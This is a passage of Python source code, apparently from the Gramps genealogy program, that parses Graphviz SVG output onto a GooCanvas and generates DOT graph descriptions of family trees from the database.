(event.y_root - self._last_y) * scale_coef)
self.vadjustment.set_value(new_y)
return True
return False
def set_zoom(self, value):
"""
Set value for zoom of the canvas widget and apply it.
"""
self.scale = value
self.canvas.set_scale(value / self.transform_scale)
def select_node(self, item, target, event):
"""
Perform actions when a node is clicked.
If middle mouse was clicked then try to set scroll mode.
"""
self.search_widget.hide_search_popover()
self.hide_bkmark_popover()
handle = item.title
node_class = item.description
button = event.get_button()[1]
self.person_to_focus = None
# perform double click on node by left mouse button
if event.type == getattr(Gdk.EventType, "DOUBLE_BUTTON_PRESS"):
# Remove all single click events
for click_item in self.click_events:
if not click_item.is_destroyed():
GLib.source_remove(click_item.get_id())
self.click_events.clear()
if button == 1 and node_class == 'node':
GLib.idle_add(self.actions.edit_person, None, handle)
return True
elif button == 1 and node_class == 'familynode':
GLib.idle_add(self.actions.edit_family, None, handle)
return True
if event.type != getattr(Gdk.EventType, "BUTTON_PRESS"):
return False
if button == 1 and node_class == 'node': # left mouse
if handle == self.active_person_handle:
# Find a parent of the active person so that they can become
# the active person, if no parents then leave as the current
# active person
parent_handle = self.find_a_parent(handle)
if parent_handle:
handle = parent_handle
else:
return True
# redraw the graph based on the selected person
# schedule after because double click can occur
click_event_id = GLib.timeout_add(200, self.view.change_active,
handle)
# add single click events to list, it will be removed if necessary
context = GLib.main_context_default()
self.click_events.append(context.find_source_by_id(click_event_id))
elif button == 3 and node_class: # right mouse
if node_class == 'node':
self.menu = PopupMenu(self, 'person', handle)
self.menu.show_menu(event)
elif node_class == 'familynode':
self.menu = PopupMenu(self, 'family', handle)
self.menu.show_menu(event)
elif button == 2: # middle mouse
# to enter in scroll mode (we should change "item" to root item)
item = self.canvas.get_root_item()
self.button_press(item, target, event)
return True
def find_a_parent(self, handle):
"""
Locate a parent from the first family that the selected person is a
child of. Try and find the father first, then the mother.
Either will be OK.
"""
person = self.dbstate.db.get_person_from_handle(handle)
try:
fam_handle = person.get_parent_family_handle_list()[0]
if fam_handle:
family = self.dbstate.db.get_family_from_handle(fam_handle)
if family and family.get_father_handle():
handle = family.get_father_handle()
elif family and family.get_mother_handle():
handle = family.get_mother_handle()
except IndexError:
handle = None
return handle
def update_lines_type(self, _menu_item, lines_type, constant):
"""
Save the lines type setting.
"""
self.view._config.set(constant, lines_type)
def update_setting(self, menu_item, constant):
"""
Save changed setting.
menu_item should be Gtk.CheckMenuItem.
"""
self.view._config.set(constant, menu_item.get_active())
def fit_text(self):
"""
Fit the text to the boxes more exactly. Works by trying some sample
text, measuring the results, and trying an increasing size of font
sizes to some sample nodes to see which one will fit the expected
text size.
In other words we are telling dot to use different font sizes than
we are actually displaying, since dot doesn't do a good job of
determining the text size.
"""
if not self.retest_font: # skip this uless font changed.
return self.bold_size, self.norm_size
text = "The quick Brown Fox jumped over the Lazy Dogs 1948-01-01."
dot_test = DotSvgGenerator(self.dbstate, self.view)
dot_test.init_dot()
# These are at the desired font sizes.
dot_test.add_node('test_bold', '<B>%s</B>' % text, shape='box')
dot_test.add_node('test_norm', text, shape='box')
# now add nodes at increasing font sizes
for scale in range(35, 140, 2):
f_size = dot_test.fontsize * scale / 100.0
dot_test.add_node(
'test_bold' + str(scale),
'<FONT POINT-SIZE="%(bsize)3.1f"><B>%(text)s</B></FONT>' %
{'text': text, 'bsize': f_size}, shape='box')
dot_test.add_node(
'test_norm' + str(scale),
text, shape='box', fontsize=("%3.1f" % f_size))
# close the graphviz dot code with a brace
dot_test.write('}\n')
# get DOT and generate SVG data by Graphviz
dot_data = dot_test.dot.getvalue().encode('utf8')
svg_data = dot_test.make_svg(dot_data)
svg_data = svg_data.decode('utf8')
# now lest find the box sizes, and font sizes for the generated svg.
points_a = findall(r'points="(.*)"', svg_data, MULTILINE)
font_fams = findall(r'font-family="(.*)" font-weight',
svg_data, MULTILINE)
font_sizes = findall(r'font-size="(.*)" fill', svg_data, MULTILINE)
box_w = []
for points in points_a:
box_pts = points.split()
x_1 = box_pts[0].split(',')[0]
x_2 = box_pts[1].split(',')[0]
box_w.append(float(x_1) - float(x_2) - 16) # adjust for margins
text_font = font_fams[0] + ", " + font_sizes[0] + 'px'
font_desc = Pango.FontDescription.from_string(text_font)
# lets measure the bold text on our canvas at desired font size
c_text = GooCanvas.CanvasText(parent=self.canvas.get_root_item(),
text='<b>' + text + '</b>',
x=100,
y=100,
anchor=GooCanvas.CanvasAnchorType.WEST,
use_markup=True,
font_desc=font_desc)
bold_b = c_text.get_bounds()
# and measure the normal text on our canvas at desired font size
c_text.props.text = text
norm_b = c_text.get_bounds()
# now scan throught test boxes, finding the smallest that will hold
# the actual text as measured. And record the dot font that was used.
for indx in range(3, len(font_sizes), 2):
if box_w[indx] > bold_b.x2 - bold_b.x1:
bold_size = float(font_sizes[indx - 1])
break
for indx in range(4, len(font_sizes), 2):
if box_w[indx] > norm_b.x2 - norm_b.x1:
norm_size = float(font_sizes[indx - 1])
break
self.retest_font = False # we don't do this again until font changes
# return the adjusted font size to tell dot to use.
return bold_size, norm_size
#-------------------------------------------------------------------------
#
# GraphvizSvgParser
#
#-------------------------------------------------------------------------
class GraphvizSvgParser(object):
"""
Parses SVG produces by Graphviz and adds the elements to a GooCanvas.
"""
def __init__(self, widget, view):
"""
Initialise the GraphvizSvgParser class.
"""
self.func = None
self.widget = widget
self.canvas = widget.canvas
self.view = view
self.highlight_home_person = self.view._config.get(
'interface.graphview-highlight-home-person')
scheme = config.get('colors.scheme')
self.home_person_color = config.get('colors.home-person')[scheme]
self.font_size = self.view._config.get('interface.graphview-font')[1]
self.tlist = []
self.text_attrs = None
self.func_list = []
self.handle = None
self.func_map = {"g": (self.start_g, self.stop_g),
"svg": (self.start_svg, self.stop_svg),
"polygon": (self.start_polygon, self.stop_polygon),
"path": (self.start_path, self.stop_path),
"image": (self.start_image, self.stop_image),
"text": (self.start_text, self.stop_text),
"ellipse": (self.start_ellipse, self.stop_ellipse),
"title": (self.start_title, self.stop_title)}
self.text_anchor_map = {"start": GooCanvas.CanvasAnchorType.WEST,
"middle": GooCanvas.CanvasAnchorType.CENTER,
"end": GooCanvas.CanvasAnchorType.EAST}
# This list is used as a LIFO stack so that the SAX parser knows
# which Goocanvas object to link the next object to.
self.item_hier = []
# list of persons items, used for animation class
self.items_list = []
self.transform_scale = 1
def parse(self, ifile):
"""
Parse an SVG file produced by Graphviz.
"""
self.item_hier.append(self.canvas.get_root_item())
parser = ParserCreate()
parser.StartElementHandler = self.start_element
parser.EndElementHandler = self.end_element
parser.CharacterDataHandler = self.characters
parser.Parse(ifile)
for key in list(self.func_map.keys()):
del self.func_map[key]
del self.func_map
del self.func_list
del parser
def start_g(self, attrs):
"""
Parse <g> tags.
"""
# The class attribute defines the group type. There should be one
# graph type <g> tag which defines the transform for the whole graph.
if attrs.get('class') == 'graph':
self.items_list.clear()
transform = attrs.get('transform')
item = self.canvas.get_root_item()
transform_list = transform.split(') ')
scale = transform_list[0].split()
scale_x = float(scale[0].lstrip('scale('))
scale_y = float(scale[1])
self.transform_scale = scale_x
if scale_x > scale_y:
self.transform_scale = scale_y
# scale should be (0..1)
# fix graphviz issue from version > 2.40.1
if self.transform_scale > 1:
self.transform_scale = 1 / self.transform_scale
item.set_simple_transform(self.bounds[1],
self.bounds[3],
self.transform_scale,
0)
item.connect("button-press-event", self.widget.button_press)
item.connect("button-release-event", self.widget.button_release)
item.connect("motion-notify-event",
self.widget.motion_notify_event)
else:
item = GooCanvas.CanvasGroup(parent=self.current_parent())
item.connect("button-press-event", self.widget.select_node)
self.items_list.append(item)
item.description = attrs.get('class')
self.item_hier.append(item)
def stop_g(self, _tag):
"""
Parse </g> tags.
"""
item = self.item_hier.pop()
item.title = self.handle
def start_svg(self, attrs):
"""
Parse <svg> tags.
"""
GooCanvas.CanvasGroup(parent=self.current_parent())
view_box = attrs.get('viewBox').split()
v_left = float(view_box[0])
v_top = float(view_box[1])
v_right = float(view_box[2])
v_bottom = float(view_box[3])
self.canvas.set_bounds(v_left, v_top, v_right, v_bottom)
self.bounds = (v_left, v_top, v_right, v_bottom)
def stop_svg(self, tag):
"""
Parse </svg> tags.
"""
pass
def start_title(self, attrs):
"""
Parse <title> tags.
"""
pass
def stop_title(self, tag):
"""
Parse </title> tags.
Stripping off underscore prefix added to fool Graphviz.
"""
self.handle = tag.lstrip("_")
def start_polygon(self, attrs):
"""
Parse <polygon> tags.
Polygons define the boxes around individuals on the graph.
"""
coord_string = attrs.get('points')
coord_count = 5
points = GooCanvas.CanvasPoints.new(coord_count)
nnn = 0
for i in coord_string.split():
coord = i.split(",")
coord_x = float(coord[0])
coord_y = float(coord[1])
points.set_point(nnn, coord_x, coord_y)
nnn += 1
style = attrs.get('style')
if style:
p_style = self.parse_style(style)
stroke_color = p_style['stroke']
fill_color = p_style['fill']
else:
stroke_color = attrs.get('stroke')
fill_color = attrs.get('fill')
if self.handle == self.widget.active_person_handle:
line_width = 3 # thick box
else:
line_width = 1 # thin box
tooltip = self.view.tags_tooltips.get(self.handle)
# highlight the home person
# stroke_color is not '#...' when tags are drawing, so we check this
# maybe this is not good solution to check for tags but it works
if self.highlight_home_person and stroke_color[:1] == '#':
home_person = self.widget.dbstate.db.get_default_person()
if home_person and home_person.handle == self.handle:
fill_color = self.home_person_color
item = GooCanvas.CanvasPolyline(parent=self.current_parent(),
points=points,
close_path=True,
fill_color=fill_color,
line_width=line_width,
stroke_color=stroke_color,
tooltip=tooltip)
# turn on tooltip show if have it
if tooltip:
item_canvas = item.get_canvas()
item_canvas.set_has_tooltip(True)
self.item_hier.append(item)
def stop_polygon(self, _tag):
"""
Parse </polygon> tags.
"""
self.item_hier.pop()
def start_ellipse(self, attrs):
"""
Parse <ellipse> tags.
These define the family nodes of the graph.
"""
center_x = float(attrs.get('cx'))
center_y = float(attrs.get('cy'))
radius_x = float(attrs.get('rx'))
radius_y = float(attrs.get('ry'))
style = attrs.get('style')
if style:
p_style = self.parse_style(style)
stroke_color = p_style['stroke']
fill_color = p_style['fill']
else:
stroke_color = attrs.get('stroke')
fill_color = attrs.get('fill')
tooltip = self.view.tags_tooltips.get(self.handle)
item = GooCanvas.CanvasEllipse(parent=self.current_parent(),
center_x=center_x,
center_y=center_y,
radius_x=radius_x,
radius_y=radius_y,
fill_color=fill_color,
stroke_color=stroke_color,
line_width=1,
tooltip=tooltip)
if tooltip:
item_canvas = item.get_canvas()
item_canvas.set_has_tooltip(True)
self.current_parent().description = 'familynode'
self.item_hier.append(item)
def stop_ellipse(self, _tag):
"""
Parse </ellipse> tags.
"""
self.item_hier.pop()
def start_path(self, attrs):
"""
Parse <path> tags.
These define the links between nodes.
Solid lines represent birth relationships and dashed lines are used
when a child has a non-birth relationship to a parent.
"""
p_data = attrs.get('d')
line_width = attrs.get('stroke-width')
if line_width is None:
line_width = 1
line_width = float(line_width)
style = attrs.get('style')
if style:
p_style = self.parse_style(style)
stroke_color = p_style['stroke']
is_dashed = 'stroke-dasharray' in p_style
else:
stroke_color = attrs.get('stroke')
is_dashed = attrs.get('stroke-dasharray')
if is_dashed:
line_dash = GooCanvas.CanvasLineDash.newv([5.0, 5.0])
item = GooCanvas.CanvasPath(parent=self.current_parent(),
data=p_data,
stroke_color=stroke_color,
line_width=line_width,
line_dash=line_dash)
else:
item = GooCanvas.CanvasPath(parent=self.current_parent(),
data=p_data,
stroke_color=stroke_color,
line_width=line_width)
self.item_hier.append(item)
def stop_path(self, _tag):
"""
Parse </path> tags.
"""
self.item_hier.pop()
def start_text(self, attrs):
"""
Parse <text> tags.
"""
self.text_attrs = attrs
def stop_text(self, tag):
"""
Parse </text> tags.
The text tag contains some textual data.
"""
tag = escape(tag)
pos_x = float(self.text_attrs.get('x'))
pos_y = float(self.text_attrs.get('y'))
anchor = self.text_attrs.get('text-anchor')
style = self.text_attrs.get('style')
# does the following always work with symbols?
if style:
p_style = self.parse_style(style)
font_family = p_style['font-family']
text_font = font_family + ", " + p_style['font-size'] + 'px'
else:
font_family = self.text_attrs.get('font-family')
text_font = font_family + ", " + str(self.font_size) + 'px'
font_desc = Pango.FontDescription.from_string(text_font)
# set bold text using PangoMarkup
if self.text_attrs.get('font-weight') == 'bold':
tag = '<b>%s</b>' % tag
# text color
fill_color = self.text_attrs.get('fill')
GooCanvas.CanvasText(parent=self.current_parent(),
text=tag,
x=pos_x,
y=pos_y,
anchor=self.text_anchor_map[anchor],
use_markup=True,
font_desc=font_desc,
fill_color=fill_color)
def start_image(self, attrs):
"""
Parse  tags.
"""
self.item_hier.pop()
def start_element(self, tag, attrs):
"""
Generic parsing function for opening tags.
"""
self.func_list.append((self.func, self.tlist))
self.tlist = []
try:
start_function, self.func = self.func_map[tag]
if start_function:
start_function(attrs)
except KeyError:
self.func_map[tag] = (None, None)
self.func = None
def end_element(self, _tag):
"""
Generic parsing function for closing tags.
"""
if self.func:
self.func(''.join(self.tlist))
self.func, self.tlist = self.func_list.pop()
def characters(self, data):
"""
Generic parsing function for tag data.
"""
if self.func:
self.tlist.append(data)
def current_parent(self):
"""
Returns the Goocanvas object which should be the parent of any new
Goocanvas objects.
"""
return self.item_hier[len(self.item_hier) - 1]
def parse_style(self, style):
"""
Parse style attributes for Graphviz version < 2.24.
"""
style = style.rstrip(';')
return dict([i.split(':') for i in style.split(';')])
#------------------------------------------------------------------------
#
# DotSvgGenerator
#
#------------------------------------------------------------------------
class DotSvgGenerator(object):
"""
Generator of graphing instructions in dot format and svg data by Graphviz.
"""
def __init__(self, dbstate, view, bold_size=0, norm_size=0):
"""
Initialise the DotSvgGenerator class.
"""
self.bold_size = bold_size
self.norm_size = norm_size
self.dbstate = dbstate
self.uistate = view.uistate
self.database = dbstate.db
self.view = view
self.dot = None # will be StringIO()
# This dictionary contains person handle as the index and the value is
# the number of families in which the person is a parent. From this
# dictionary is obtained a list of person handles sorted in decreasing
# value order which is used to keep multiple spouses positioned
# together.
self.person_handles_dict = {}
self.person_handles = []
# list of persons on path to home person
self.current_list = list()
self.home_person = None
# Gtk style context for scrollwindow
self.context = self.view.graph_widget.sw_style_context
# font if we use genealogical symbols
self.sym_font = None
self.avatars = Avatars(self.view._config)
def __del__(self):
"""
Free stream file on destroy.
"""
if self.dot:
self.dot.close()
def init_dot(self):
"""
Init/reinit stream for dot file.
Load and write config data to start of dot file.
"""
if self.dot:
self.dot.close()
self.dot = StringIO()
self.current_list.clear()
self.person_handles_dict.clear()
self.show_images = self.view._config.get(
'interface.graphview-show-images')
self.show_avatars = self.view._config.get(
'interface.graphview-show-avatars')
self.show_full_dates = self.view._config.get(
'interface.graphview-show-full-dates')
self.show_places = self.view._config.get(
'interface.graphview-show-places')
self.place_format = self.view._config.get(
'interface.graphview-place-format') - 1
self.show_tag_color = self.view._config.get(
'interface.graphview-show-tags')
spline = self.view._config.get('interface.graphview-show-lines')
self.spline = SPLINE.get(int(spline))
self.descendant_generations = self.view._config.get(
'interface.graphview-descendant-generations')
self.ancestor_generations = self.view._config.get(
'interface.graphview-ancestor-generations')
self.person_theme_index = self.view._config.get(
'interface.graphview-person-theme')
self.show_all_connected = self.view._config.get(
'interface.graphview-show-all-connected')
ranksep = self.view._config.get('interface.graphview-ranksep')
ranksep = ranksep * 0.1
nodesep = self.view._config.get('interface.graphview-nodesep')
nodesep = nodesep * 0.1
self.avatars.update_current_style()
# get background color from gtk theme and convert it to hex
# else use white background
bg_color = self.context.lookup_color('theme_bg_color')
if bg_color[0]:
bg_rgb = (bg_color[1].red, bg_color[1].green, bg_color[1].blue)
bg_color = rgb_to_hex(bg_rgb)
else:
bg_color = '#ffffff'
# get font color from gtk theme and convert it to hex
# else use black font
font_color = self.context.lookup_color('theme_fg_color')
if font_color[0]:
fc_rgb = (font_color[1].red, font_color[1].green,
font_color[1].blue)
font_color = rgb_to_hex(fc_rgb)
else:
font_color = '#000000'
# get colors from config
home_path_color = self.view._config.get(
'interface.graphview-home-path-color')
# set of colors
self.colors = {'link_color': font_color,
'home_path_color': home_path_color}
self.arrowheadstyle = 'none'
self.arrowtailstyle = 'none'
dpi = 72
# use font from config if needed
font = self.view._config.get('interface.graphview-font')
fontfamily = self.resolve_font_name(font[0])
self.fontsize = font[1]
if not self.bold_size:
self.bold_size = self.norm_size = font[1]
pagedir = "BL"
rankdir = "TB"
ratio = "compress"
# as we are not using paper,
# choose a large 'page' size with no margin
sizew = 100
sizeh = 100
xmargin = 0.00
ymargin = 0.00
self.write('digraph GRAMPS_graph\n')
self.write('{\n')
self.write(' bgcolor="%s";\n' % bg_color)
self.write(' center="false"; \n')
self.write(' charset="utf8";\n')
self.write(' concentrate="false";\n')
self.write(' dpi="%d";\n' % dpi)
self.write(' graph [fontsize=%3.1f];\n' % self.fontsize)
self.write(' margin="%3.2f,%3.2f"; \n' % (xmargin, ymargin))
self.write(' mclimit="99";\n')
self.write(' nodesep="%.2f";\n' % nodesep)
self.write(' outputorder="edgesfirst";\n')
self.write(' pagedir="%s";\n' % pagedir)
self.write(' rankdir="%s";\n' % rankdir)
self.write(' ranksep="%.2f";\n' % ranksep)
self.write(' ratio="%s";\n' % ratio)
self.write(' searchsize="100";\n')
self.write(' size="%3.2f,%3.2f"; \n' % (sizew, sizeh))
self.write(' splines=%s;\n' % self.spline)
self.write('\n')
self.write(' edge [style=solid fontsize=%d];\n' % self.fontsize)
if fontfamily:
self.write(' node [style=filled fontname="%s" '
'fontsize=%3.1f fontcolor="%s"];\n'
% (fontfamily, self.norm_size, font_color))
else:
self.write(' node [style=filled fontsize=%3.1f fontcolor="%s"];\n'
% (self.norm_size, font_color))
self.write('\n')
self.uistate.connect('font-changed', self.font_changed)
self.symbols = Symbols()
self.font_changed()
def resolve_font_name(self, font_name):
"""
Helps to resolve font by graphviz.
"""
# Sometimes graphviz have problem with font resolving.
font_family_map = {"Times New Roman": "Times",
"Times Roman": "Times",
"Times-Roman": "Times",
}
font = font_family_map.get(font_name)
if font is None:
font = font_name
return font
def font_changed(self):
dth_idx = self.uistate.death_symbol
if self.uistate.symbols:
self.bth = self.symbols.get_symbol_for_string(
self.symbols.SYMBOL_BIRTH)
self.dth = self.symbols.get_death_symbol_for_char(dth_idx)
else:
self.bth = self.symbols.get_symbol_fallback(
self.symbols.SYMBOL_BIRTH)
self.dth = self.symbols.get_death_symbol_fallback(dth_idx)
# make sure to display in selected symbols font
self.sym_font = config.get('utf8.selected-font')
self.bth = '<FONT FACE="%s">%s</FONT>' % (self.sym_font, self.bth)
self.dth = '<FONT FACE="%s">%s</FONT>' % (self.sym_font, self.dth)
def build_graph(self, active_person):
"""
Builds a GraphViz tree based on the active person.
"""
# reinit dot file stream (write starting graphviz dot code to file)
self.init_dot()
if active_person:
self.home_person = self.dbstate.db.get_default_person()
self.set_current_list(active_person)
self.set_current_list_desc(active_person)
if self.show_all_connected:
try:
self.person_handles_dict.update(
self.find_connected(active_person))
except:
w_msg = _("Can't build graph with all connections to "
"active person. This option will be disabled. "
"You can try to reduce generations count "
"settings and enable it again.")
logging.warning(w_msg)
WarningDialog(_('Disabling "All Connected" option'), w_msg)
return False
else:
self.person_handles_dict.update(
self.find_descendants(active_person))
self.person_handles_dict.update(
self.find_ancestors(active_person))
if self.person_handles_dict:
self.person_handles = sorted(
self.person_handles_dict,
key=self.person_handles_dict.__getitem__,
reverse=True)
self.add_persons_and_families()
self.add_child_links_to_families()
# close the graphviz dot code with a brace
self.write('}\n')
# get DOT and generate SVG data by Graphviz
dot_data = self.dot.getvalue().encode('utf8')
svg_data = self.make_svg(dot_data)
return (dot_data, svg_data)
def make_svg(self, dot_data):
"""
Make SVG data by Graphviz.
"""
if win():
svg_data = Popen(['dot', '-Tsvg'],
creationflags=DETACHED_PROCESS,
stdin=PIPE,
stdout=PIPE,
stderr=PIPE).communicate(input=dot_data)[0]
else:
svg_data = Popen(['dot', '-Tsvg'],
stdin=PIPE,
stdout=PIPE).communicate(input=dot_data)[0]
return svg_data
def set_current_list(self, active_person, recurs_list=None):
"""
Get the path from the active person to the home person.
Select ancestors.
"""
if not active_person:
return False
person = self.database.get_person_from_handle(active_person)
if recurs_list is None:
recurs_list = set() # make a recursion check list (actually a set)
# see if we have a recursion (database loop)
elif active_person in recurs_list:
logging.warning(_("Relationship loop detected"))
return False
recurs_list.add(active_person) # record where we have been for check
if person == self.home_person:
self.current_list.append(active_person)
return True
else:
for fam_handle in person.get_parent_family_handle_list():
family = self.database.get_family_from_handle(fam_handle)
if self.set_current_list(family.get_father_handle(),
recurs_list=recurs_list):
self.current_list.append(active_person)
self.current_list.append(fam_handle)
return True
if self.set_current_list(family.get_mother_handle(),
recurs_list=recurs_list):
self.current_list.append(active_person)
self.current_list.append(fam_handle)
return True
return False
def set_current_list_desc(self, active_person, recurs_list=None):
"""
Get the path from the active person to the home person.
Select children.
"""
if not active_person:
return False
person = self.database.get_person_from_handle(active_person)
if recurs_list is None:
recurs_list = set() # make a recursion check list (actually a set)
# see if we have a recursion (database loop)
elif active_person in recurs_list:
logging.warning(_("Relationship loop detected"))
return False
recurs_list.add(active_person) # record where we have been for check
if person == self.home_person:
self.current_list.append(active_person)
return True
else:
for fam_handle in person.get_family_handle_list():
family = self.database.get_family_from_handle(fam_handle)
for child in family.get_child_ref_list():
if self.set_current_list_desc(child.ref,
recurs_list=recurs_list):
self.current_list.append(active_person)
self.current_list.append(fam_handle)
return True
return False
def find_connected(self, active_person):
"""
Spider the database from the active person.
"""
person = self.database.get_person_from_handle(active_person)
person_handles = {}
self.add_connected(person, self.descendant_generations,
self.ancestor_generations, person_handles)
return person_handles
def add_connected(self, person, num_desc, num_anc, person_handles):
"""
Include all connected to active in the list of people to graph.
"""
if not person:
return
# check if handle is not already processed
if person.handle not in person_handles:
spouses_list = person.get_family_handle_list()
# add self
person_handles[person.handle] = len(spouses_list)
else:
return
# add descendants
if num_desc >= 0: # generation restriction
for family_handle in spouses_list:
family = self.database.get_family_from_handle(family_handle)
if num_desc > 0: # generation restriction
# add every child recursively
for child_ref in family.get_child_ref_list():
if child_ref.ref in person_handles:
continue
self.add_connected(
self.database.get_person_from_handle(child_ref.ref),
num_desc-1, num_anc+1, person_handles)
# add person spouses
for sp_handle in (family.get_father_handle(),
family.get_mother_handle()):
if sp_handle and sp_handle not in person_handles:
self.add_connected(
self.database.get_person_from_handle(sp_handle),
num_desc, num_anc, person_handles)
# add ancestors
if num_anc > 0: # generation restriction
for family_handle in person.get_parent_family_handle_list():
family = self.database.get_family_from_handle(family_handle)
# add every ancestor's spouses
for sp_handle in (family.get_father_handle(),
family.get_mother_handle()):
if sp_handle and sp_handle not in person_handles:
self.add_connected(
self.database.get_person_from_handle(sp_handle),
num_desc+1, num_anc-1, person_handles)
def find_descendants(self, active_person):
"""
Spider the database from the active person.
"""
person = self.database.get_person_from_handle(active_person)
person_handles = {}
self.add_descendant(person, self.descendant_generations,
person_handles)
return person_handles
def add_descendant(self, person, num_generations, person_handles):
"""
Include a descendant in the list of people to graph.
"""
if not person:
return
# check if handle is not already processed
# and add self and spouses
if person.handle not in person_handles:
spouses_list = person.get_family_handle_list()
person_handles[person.handle] = len(spouses_list)
self.add_spouses(person, person_handles)
else:
return
if num_generations <= 0:
return
# add every child recursively
for family_handle in spouses_list:
family = self.database.get_family_from_handle(family_handle)
for child_ref in family.get_child_ref_list():
self.add_descendant(
self.database.get_person_from_handle(child_ref.ref),
num_generations - 1, person_handles)
def add_spouses(self, person, person_handles):
"""
Add spouses to the list.
"""
if not person:
return
for family_handle in person.get_family_handle_list():
sp_family = self.database.get_family_from_handle(family_handle)
for sp_handle in (sp_family.get_father_handle(),
sp_family.get_mother_handle()):
if sp_handle and sp_handle not in person_handles:
# add only spouse (num_generations = 0)
self.add_descendant(
self.database.get_person_from_handle(sp_handle),
0, person_handles)
def find_ancestors(self, active_person):
"""
Spider the database from the active person.
"""
person = self.database.get_person_from_handle(active_person)
person_handles = {}
self.add_ancestor(person, self.ancestor_generations, person_handles)
return person_handles
def add_ancestor(self, person, num_generations, person_handles):
"""
Include an ancestor in the list of people to graph.
"""
if not person:
return
# add self if handle is not already processed
if person.handle not in person_handles:
person_handles[person.handle] = len(person.get_family_handle_list())
else:
return
if num_generations <= 0:
return
for family_handle in person.get_parent_family_handle_list():
family = self.database.get_family_from_handle(family_handle)
# add parents
sp_persons = []
for sp_handle in (family.get_father_handle(),
family.get_mother_handle()):
if sp_handle and sp_handle not in person_handles:
sp_person = self.database.get_person_from_handle(sp_handle)
self.add_ancestor(sp_person,
num_generations - 1,
person_handles)
sp_persons.append(sp_person)
# add every other spouses for parents
for sp_person in sp_persons:
self.add_spouses(sp_person, person_handles)
def add_child_links_to_families(self):
"""
Returns string of GraphViz edges linking parents to families or
children.
"""
for person_handle in self.person_handles:
person = self.database.get_person_from_handle(person_handle)
for fam_handle in person.get_parent_family_handle_list():
family = self.database.get_family_from_handle(fam_handle)
father_handle = family.get_father_handle()
mother_handle = family.get_mother_handle()
for child_ref in family.get_child_ref_list():
if child_ref.ref == person_handle:
frel = child_ref.frel
mrel = child_ref.mrel
break
if((father_handle in self.person_handles) or
(mother_handle in self.person_handles)):
# link to the family node if either parent is in graph
self.add_family_link(person_handle, family, frel, mrel)
def add_family_link(self, p_id, family, frel, mrel):
"""
Links the child to a family.
"""
style = 'solid'
adopted = ((int(frel) != ChildRefType.BIRTH) or
(int(mrel) != ChildRefType.BIRTH))
# if birth relation to father is NONE, meaning there is no father and
# if birth relation to mother is BIRTH then solid line
if((int(frel) == ChildRefType.NONE) and
(int(mrel) == ChildRefType.BIRTH)):
adopted = False
if adopted:
style = 'dotted'
self.add_link(family.handle, p_id, style,
self.arrowheadstyle, self.arrowtailstyle,
color=self.colors['home_path_color'],
bold=self.is_in_path_to_home(p_id))
def add_parent_link(self, p_id, parent_handle, rel):
"""
Links the child to a parent.
"""
style = 'solid'
if int(rel) != ChildRefType.BIRTH:
style = 'dotted'
self.add_link(parent_handle, p_id, style,
self.arrowheadstyle, self.arrowtailstyle,
color=self.colors['home_path_color'],
bold=self.is_in_path_to_home(p_id))
def add_persons_and_families(self):
"""
Adds nodes for persons and their families.
Subgraphs are used to indicate to Graphviz that parents of families
should be positioned together. The person_handles list is sorted so
that people with the largest number of spouses are at the start of the
list. As families are only processed once, this means people with
multiple spouses will have their additional spouses included in their
subgraph.
"""
# variable to communicate with get_person_label
url = ""
# The list of families for which we have output the node,
# so we don't do it twice
# use set() as it little faster then list()
family_nodes_done = set()
family_links_done = set()
for person_handle in self.person_handles:
person = self.database.get_person_from_handle(person_handle)
# Output the person's node
label = self.get_person_label(person)
(shape, style, color, fill) = self.get_gender_style(person)
self.add_node(person_handle, label, shape, color, style, fill, url)
# Output family nodes where person is a parent
family_list = person.get_family_handle_list()
for fam_handle in family_list:
if fam_handle not in family_nodes_done:
family_nodes_done.add(fam_handle)
self.__add_family_node(fam_handle)
# Output family links where person is a parent
subgraph_started = False
family_list = person.get_family_handle_list()
for fam_handle in family_list:
if fam_handle not in family_links_done:
family_links_done.add(fam_handle)
if not subgraph_started:
subgraph_started = True
self.start_subgraph(person_handle)
self.__add_family_links(fam_handle)
if subgraph_started:
self.end_subgraph()
def is_in_path_to_home(self, f_handle):
"""
Is the current person in the path to the home person?
"""
if f_handle in self.current_list:
return True
return False
def __add_family_node(self, fam_handle):
"""
Add a node for a family.
"""
fam = self.database.get_family_from_handle(fam_handle)
fill, color = color_graph_family(fam, self.dbstate)
style = "filled"
label = self.get_family_label(fam)
self.add_node(fam_handle, label, "ellipse", color, style, fill)
def __add_family_links(self, fam_handle):
"""
Add the links for spouses.
"""
fam = self.database.get_family_from_handle(fam_handle)
f_handle = fam.get_father_handle()
m_handle = fam.get_mother_handle()
if f_handle in self.person_handles:
self.add_link(f_handle,
fam_handle, "",
self.arrowheadstyle,
self.arrowtailstyle,
color=self.colors['home_path_color'],
bold=self.is_in_path_to_home(f_handle))
if m_handle in self.person_handles:
self.add_link(m_handle,
fam_handle, "",
self.arrowheadstyle,
self.arrowtailstyle,
color=self.colors['home_path_color'],
bold=self.is_in_path_to_home(m_handle))
def get_gender_style(self, person):
"""
Return gender specific person style.
"""
gender = person.get_gender()
shape = "box"
style = "solid, filled"
# get alive status of person to get box color
try:
alive = probably_alive(person, self.dbstate.db)
except RuntimeError:
alive = False
fill, color = color_graph_box(alive, gender)
return(shape, style, color, fill)
def get_tags_and_table(self, obj):
"""
Return html tags table for obj (person or family).
"""
tag_table = ''
tags = []
for tag_handle in obj.get_tag_list():
tags.append(self.dbstate.db.get_tag_from_handle(tag_handle))
# prepare html table of tags
if tags:
tag_table = ('<TABLE BORDER="0" CELLBORDER="0" '
'CELLPADDING="5"><TR>')
for tag in tags:
rgba = Gdk.RGBA()
rgba.parse(tag.get_color())
value = '#%02x%02x%02x' % (int(rgba.red * 255),
int(rgba.green * 255),
int(rgba.blue * 255))
tag_table += '<TD BGCOLOR="%s"></TD>' % value
tag_table += '</TR></TABLE>'
return tags, tag_table
def get_person_themes(self, index=-1):
"""
Person themes.
If index == -1 return list of themes.
If index out of range return default theme.
"""
person_themes = [
(0, _('Default'),
'<TABLE '
'BORDER="0" CELLSPACING="2" CELLPADDING="0" CELLBORDER="0">'
'<TR><TD>%(img)s</TD></TR>'
'<TR><TD><FONT POINT-SIZE="%(bsize)3.1f"><B>%(name)s</B>'
'</FONT></TD></TR>'
'<TR><TD ALIGN="LEFT">%(birth_str)s</TD></TR>'
'<TR><TD ALIGN="LEFT">%(death_str)s</TD></TR>'
'<TR><TD>%(tags)s</TD></TR>'
'</TABLE>'
),
(1, _('Image on right side'),
'<TABLE '
'BORDER="0" CELLSPACING="5" CELLPADDING="0" CELLBORDER="0">'
'<tr>'
'<td colspan="2"><FONT POINT-SIZE="%(bsize)3.1f"><B>%(name)s'
'</B></FONT></td>'
